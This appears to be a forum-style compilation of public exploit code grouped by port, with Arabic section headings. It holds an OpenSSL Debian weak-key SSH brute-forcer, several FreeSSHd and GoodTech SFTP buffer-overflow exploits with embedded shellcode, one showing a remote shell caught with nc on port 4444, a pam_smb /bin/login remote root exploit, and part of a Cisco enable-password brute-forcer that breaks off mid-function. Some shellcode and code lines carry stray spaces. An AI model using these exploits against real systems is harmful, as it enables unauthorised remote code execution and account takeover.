# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
################################################## ##########################
import Queue
import os
import string
import time
from threading import Thread
import sys
#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False
def Finish(self):
self.end = True
def GetEnd(self):
return self.end
#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port=' 22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port
def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()
cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'
pin,pout,perr = os.popen3(cmd, 'r')
pin.close()
#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()
if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
print './exploit.py <dir> <host> <user> [[port] [threads]]'
print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' <host>: The victim host'
print ' <user>: The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).sta rt()
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize
print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
# [2008-06-01]
22 freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit
#!/usr/bin/perl
################################################## #############################
# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ #
# Exploit based on securfrog Poc http://www.enigmagroup.org/exploits/5709 #
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
################################################## #############################
# #
# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2 #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow #
# [+] Coded by Matteo Memelli aka ryujin #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk << #
# [+] Exploiting FreSSHDService... #
# [+] Sending Payload... #
# Done! CTRL-C and check your shell on port 4444 #
# #
# bt POCS # nc 10.150.0.228 4444 #
# Microsoft Windows [Version 6.0.6000] #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. #
# #
# C:\Users\ryujin\Desktop> #
# #
################################################## #############################
use strict;
use Net::SSH2;
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
print "TARGET: 1 -> XPSP2\n";
print "TARGET: 2 -> VISTA\n";
exit;
}
# Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x46\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x36\x4b\x48".
"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x 4b\x48\x4e\x47".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x31\x4b\x58".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x 46\x33\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x 46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x 45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x 4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x42\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x 41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x 4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x 50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x46".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x 47\x57\x43\x37".
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x 49\x58\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x 4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x 43\x35\x43\x54".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x 4a\x46\x41\x31".
"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x 4a\x36\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x36\x42\x31".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x 4d\x4a\x50\x32".
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x 4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x 4f\x4f\x48\x4d".
"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x 43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x 48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x 4a\x36\x43\x56".
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x 49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x 41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x 44\x44\x4e\x52".
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x 46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x 41\x35\x4c\x46".
"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x 42\x4d\x4a\x36".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x 47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x 4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
my $nops = "\x90"x64;
my $offset1xp = "\x41"x242;
my $offset1vi = "\x41"x226;
my $offset2xp = "\x41"x24;
my $offset2vi = "\x41"x43;
my $ppr = "\xde\x13\x40";
my $jmpsxp = "\xeb\xe1\x90\x90";
my $jmpsvi = "\xeb\xce\x90\x90";
my $jmpn = "\xe9\x23\xfc\xff\xff";
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
if ($ARGV[4] == '1')
{
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmps xp.$ppr;
}
elsif ($ARGV[4] == '2')
{
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmps vi.$ppr;
}
else
{
print "[-] TARGET ERROR!\n";
exit;
}
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
print "[+] Coded by Matteo Memelli aka ryujin\n";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...\n";
print "[+] Sending Payload...\n";
print " Done! CTRL-C and check your shell on port 4444\n";
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);
exit;
# [2008-06-06]
22 GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit
# GoodTech SSH Remote Buffer Overflow Exploit
# Written by r0ut3r - writ3r [at] gmail.com
#
# SSH_FXP_OPEN command contains a buffer oveflow.
#
# All other operations are also vulnerable, opendir, unlink, etc.
#
# 0day for 2 months :)
use Net::SSH2;
my $user = "root";
my $pass = "yahh";
my $ip = "127.0.0.1";
my $port = 22;
my $ssh2 = Net::SSH2->new();
print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";
my $junk = 'A'x164;
my $eip = "\x49\x13\x9c\x7c"; #call esp
my $nops = "\x90"x20;
my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x33".
"\x2e\x9c\x0e\x83\xeb\xfc\xe2\xf4\xcf\x44\x77\x43\x db\xd7\x63\xf1".
"\xcc\x4e\x17\x62\x17\x0a\x17\x4b\x0f\xa5\xe0\x0b\x 4b\x2f\x73\x85".
"\x7c\x36\x17\x51\x13\x2f\x77\x47\xb8\x1a\x17\x0f\x dd\x1f\x5c\x97".
"\x9f\xaa\x5c\x7a\x34\xef\x56\x03\x32\xec\x77\xfa\x 08\x7a\xb8\x26".
"\x46\xcb\x17\x51\x17\x2f\x77\x68\xb8\x22\xd7\x85\x 6c\x32\x9d\xe5".
"\x30\x02\x17\x87\x5f\x0a\x80\x6f\xf0\x1f\x47\x6a\x b8\x6d\xac\x85".
"\x73\x22\x17\x7e\x2f\x83\x17\x4e\x3b\x70\xf4\x80\x 7d\x20\x70\x5e".
"\xcc\xf8\xfa\x5d\x55\x46\xaf\x3c\x5b\x59\xef\x3c\x 6c\x7a\x63\xde".
"\x5b\xe5\x71\xf2\x08\x7e\x63\xd8\x6c\xa7\x79\x68\x b2\xc3\x94\x0c".
"\x66\x44\x9e\xf1\xe3\x46\x45\x07\xc6\x83\xcb\xf1\x e5\x7d\xcf\x5d".
"\x60\x7d\xdf\x5d\x70\x7d\x63\xde\x55\x46\x8d\x52\x 55\x7d\x15\xef".
"\xa6\x46\x38\x14\x43\xe9\xcb\xf1\xe5\x44\x8c\x5f\x 66\xd1\x4c\x66".
"\x97\x83\xb2\xe7\x64\xd1\x4a\x5d\x66\xd1\x4c\x66\x d6\x67\x1a\x47".
"\x64\xd1\x4a\x5e\x67\x7a\xc9\xf1\xe3\xbd\xf4\xe9\x 4a\xe8\xe5\x59".
"\xcc\xf8\xc9\xf1\xe3\x48\xf6\x6a\x55\x46\xff\x63\x ba\xcb\xf6\x5e".
"\x6a\x07\x50\x87\xd4\x44\xd8\x87\xd1\x1f\x5c\xfd\x 99\xd0\xde\x23".
"\xcd\x6c\xb0\x9d\xbe\x54\xa4\xa5\x98\x85\xf4\x7c\x cd\x9d\x8a\xf1".
"\x46\x6a\x63\xd8\x68\x79\xce\x5f\x62\x7f\xf6\x0f\x 62\x7f\xc9\x5f".
"\xcc\xfe\xf4\xa3\xea\x2b\x52\x5d\xcc\xf8\xf6\xf1\x cc\x19\x63\xde".
"\xb8\x79\x60\x8d\xf7\x4a\x63\xd8\x61\xd1\x4c\x66\x dc\xe0\x7c\x6e".
"\x60\xd1\x4a\xf1\xe3\x2e\x9c\x0e";
my $payload = $junk.$eip.$nops.$shellcode;
my $sftp = $ssh2->sftp();
$sftp->open($payload);
print "[+] Sent";
$ssh2->disconnect;
# [2008-10-22 ]
22 FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit (SEH)
# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit
#
# Advisory: http://www.bmgsec.com.au/advisory/45/
# Original: http://www.bmgsec.com.au/advisory/32/
# Related : http://www.bmgsec.com.au/advisory/42/
#
# Test box: WinXP Pro SP2 English
#
# Exploit code for a vulnerability I discovered sometime
# ago in FreeSSHd 1.2.1. This code should be run from a
# user titled "root", or adjust the payload for your
# username. I've left space for adjustments. Up to the
# first six NOPs can be used (inclusive).
#
# The code exploits a vulnerability in the SFTP Rename
# operation. The vulnerability was patched in 1.2.2
#
# 00416F98 50 PUSH EAX
# 00416F99 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
# 00416F9F 50 PUSH EAX
# 00416FA0 E8 45B50400 CALL <JMP.&MSVCRT.strcpy>
#
#
# Written and discovered by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
use Net::SSH2;
my $user = "root";
my $pass = "yahh";
my $ip = "127.0.0.1";
my $port = 22;
my $ssh2 = Net::SSH2->new();
print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";
$nop = "\x90";
$padding = 'A' x 105;
my $SEH = "\x21\x11\x40\x00"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe)
my $nextSEH = "\xEB\xF0\x90\x90"; # jmp short 240, nop, nop
$mShellcode = "\xE9\xF2\xFE\xFF\xFF";
# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com
my $shellcode =
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x02".
"\x28\x29\x10\x83\xeb\xfc\xe2\xf4\xfe\xc0\x6d\x10\x 02\x28\xa2\x55".
"\x3e\xa3\x55\x15\x7a\x29\xc6\x9b\x4d\x30\xa2\x4f\x 22\x29\xc2\x59".
"\x89\x1c\xa2\x11\xec\x19\xe9\x89\xae\xac\xe9\x64\x 05\xe9\xe3\x1d".
"\x03\xea\xc2\xe4\x39\x7c\x0d\x14\x77\xcd\xa2\x4f\x 26\x29\xc2\x76".
"\x89\x24\x62\x9b\x5d\x34\x28\xfb\x89\x34\xa2\x11\x e9\xa1\x75\x34".
"\x06\xeb\x18\xd0\x66\xa3\x69\x20\x87\xe8\x51\x1c\x 89\x68\x25\x9b".
"\x72\x34\x84\x9b\x6a\x20\xc2\x19\x89\xa8\x99\x10\x 02\x28\xa2\x78".
"\x3e\x77\x18\xe6\x62\x7e\xa0\xe8\x81\xe8\x52\x40\x 6a\x56\xf1\xf2".
"\x71\x40\xb1\xee\x88\x26\x7e\xef\xe5\x4b\x48\x7c\x 61\x28\x29\x10";
my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH;
my $sftp = $ssh2->sftp();
$sftp->rename($payload, 'B');
print "[+] Sent";
$ssh2->disconnect;
# [2009-03-27]
#######################################
انتهينا من بورت 22
#######################################
نبداء بـ بورت 23
23 Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit
/*
* Linux pam_lib_smb < 1.1.6 /bin/login exploit
* by vertex
*
* Tested on Redhat 8.0, 9.0
*
*
* Advisory at
* http://us2.samba.org/samba/ftp/pam_smb/
*
* code based on : UC_login.c
* SunOS 5.6,5.7,5.8 remote /bin/login root exploit
* [mikecc/unixclan]
*
* ================================================== ===========
* In order to use pam_lib_smb, need to add following line on top
* of /etc/pam.d/login
*
* auth required /lib/security/pam_smb_auth.so
*
* And config the /etc/pam_smb.conf correctly.
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>
/* first negotiate */
/* packet capture by ethereal */
char packet_1[] = {
0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb,
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff,
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,
0xff, 0xfb, 0x23 };
char packet_2[] = {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff,
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34,
0x30, 0x30, 0x2c, 0x33, 0x38, 0x34, 0x30, 0x30,
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69,
0x64, 0x73,
/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa,
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48,
0x4f, 0x52, 0x49, 0x54, 0x59, 0x01, 0x2f, 0x68,
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69, 0x65, 0x2f,
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72,
0x69, 0x74, 0x79, 0x00, 0x44, 0x49, 0x53, 0x50,
0x4c, 0x41, 0x59, 0x01,
};
char packet_2_1[]={
0x6c, 0x69, 0x64, 0x73,
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00,
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0 };
/* here is the TERM value */
/*
*/
void login(int);
void negotiate(int);
void sendstr(int,char *,int);
void wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int opt);
/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned char sc[] =
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";
int main(int argc,char **argv)
{
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
short port = -1;
int x;
char *host = NULL;
char *user = NULL;
char exp[1024];
int a;
char *default_port = "23";
printf("linux_pam_smb\n");
printf("Linux lib_pam_smb < 1.1.6 /bin/login remote exploit\n");
printf("[vertex//lids/org]\n\n");
if (argc < 2)
{
printf("%s -h <victim> [-p port] \n",argv[0]);
return 0;
}
while ((a = getopt(argc,argv,"h:p:u:")) != -1)
{
switch (a)
{
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
default:
printf("[-] invalid option.\n");
break;
}
}
if (host == NULL)
{
printf("[-] must specify a host to attack\n");
return 0;
}
if (port < 0)
port = atoi(default_port);
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
printf(" attacking %s:%d\n",host,port);
printf(" opening socket\n");
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("[-] could not create socket");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
printf("[-] failed to connect to %s\n",host);
return 0;
}
printf(" connected!\n");
printf(" Begin negotiate... \n");
negotiate(sd);
printf(" Login... \n");
login(sd);
return 0;
}
void login(int sd)
{
char buf[1024];
char exploit_buf[172];
char cx[3]="\r\n\0";
int x;
fd_set rset;
memset(exploit_buf,'\0',172);
/* let's jump to 0xbffffe30 */
/* eb 30 fe ff bf */
x = 0;
exploit_buf[x++]=0x68;
/* push 0xbffffe30 */
/* shellcode address */
exploit_buf[x++]=0x30;
exploit_buf[x++]=0xfe;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xbf;
exploit_buf[x++]=0xbf;
/* ret */
exploit_buf[x++]=0xc3;
memset(exploit_buf+x,'A',150);
x+=150;
/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is
pop $exx
pop $exx
ret
*/
exploit_buf[x++]=0xb5;
exploit_buf[x++]=0xd4;
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, "xie\r\n\0");
printf(" sending username \n");
sendstr(sd,buf,strlen(buf));
sleep(1);
printf(" sending password\n");
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, exploit_buf);
strcat(buf,"\r\n\0");
sendstr(sd,buf,strlen(buf));
sleep(2);
fflush(stdout);
FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
FD_SET(0,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(-1);
}
fprintf(stderr,"%s",buf);
}
if (FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}
/*
* telnet negotiation needed for
* talking with the telnet protocol
*/
void negotiate(int sd)
{
char buf[1024];
char nop[64];
int len;
sendstr(sd, packet_1,sizeof(packet_1));
sleep(2);
memset(buf,'\0',sizeof(buf));
memset(nop,'A',sizeof(nop));
memcpy(buf,packet_2,sizeof(packet_2));
/* adding NOP */
memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
/* shellcode */
memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
/* left packet */
memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc) ,packet_2_1,sizeof(packet_2_1));
len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
sendstr(sd, buf, len);
sleep(1);
/* wont echo */
wont(sd,TELOPT_ECHO);
sleep(1);
/* do echo */
cmd(sd,TELOPT_ECHO);
sleep(2);
}
/*
* send a telnet WONT
*
* structure of a telnet WONT is:
* 1. IAC
* 2. WONT
* 3. what you wont do
* (all of the above are found in arpa/telnet.h)
*/
void wont(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WONT,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
* send a telnet WILL
*
* structure of a telnet WILL is:
* 1. IAC
* 2. WILL
* 3. what you will do
* (all of the above are found in arpa/telnet.h)
*/
void will(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WILL,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
void cmd(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c\xfd%c",IAC,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
*
*/
void sendstr(int sd,char *str,int length)
{
write(sd,str,length);
sleep(1);
}
// [2003-08-29]
23 Cisco Password Bruteforcer Exploit
/*
.: free source :. .: coded 4 Avatar Corp :.
enabler.
cisco internal bruteforcer.
coder - norby
concept - anyone
this program just logs into a CISCO router and tries a list of
passes looking for the enable one.
it works in password-only CISCO as well in login-pass ones and
has been succesfully tested on many 2600 and a few 12008.
the prog's concept [bruteforcing a router for gaining enable access]
is quite simple ...how amazing I haven't seen similar progs before!
anti eleet&0day force ;)
anyway... information wants to be free :)
sciao belli
saluti a berserker mandarine, acidcrash
beho x la traduzione :)
norby
saluti a *lei*, saluti a gabriella che a capodanno
non ha voluto lasciare il ragazzo x fare un bambino con me ;)
saluti a tutti gli avatar, a sandman, a tutte le diecimila
persone che conosco
any
saluti a Acida, storm\, Raid
contact` norby - [email protected] anyone - [email protected]
www.avatarcorp.org
neural collapse _ i truly hope in this project
v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery
(very simple feature)
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"
struct sockaddr_in addr;
char host[100];
struct hostent *hp;
int sock_stat;
int n,x;
char **password;
char resolve(char *inputhost) {
int a,b,c,d;
if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
hp = gethostbyname(inputhost);
if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
(unsigned char)hp->h_addr_list[0][1],
(unsigned char)hp->h_addr_list[0][2],
(unsigned char)hp->h_addr_list[0][3]);
}
else { strncpy(host,inputhost,100); }
}
int sock(char *hostoresolve,int port) {
int err;
sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }
addr.sin_family = PF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);
err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
}
int banner() {
printf("\n%s enabler.\n", BOX);
printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
printf("%s coded by norby\n", BOX);
}
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }
void sig() {
if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
printf("\n\033[0m"); exit(0);
}
int login(char *login, char *pass) {
char *input = malloc(4000);
int reqlogin;
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,"ogin:")||strstr(input,"sername:")) {
if(!strcmp(login,"n0login")) {
printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
exit(0);
}
printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
}
if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
bzero(input,4000);
}
if(reqlogin==1) {
write(sock_stat,login,strlen(login));
write(sock_stat,"\r\n",2);
while(read(sock_stat,input,4000)>0) {
if(strstr(input,"assword")); { break; }
}
}
write(sock_stat,pass,strlen(pass));
write(sock_stat,"\r\n",2);
sleep(2);
bzero(input,4000);
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
/* if(strstr(input,"assword:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}*/
if(strstr(input,"sername:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}
bzero(input,4000);
}
}
int loadwordlist(char *list) {
FILE *passlist;
char buf[32], fake;
int i,z;
if ((passlist = fopen(list, "r")) == NULL) {
printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
exit(0);
}
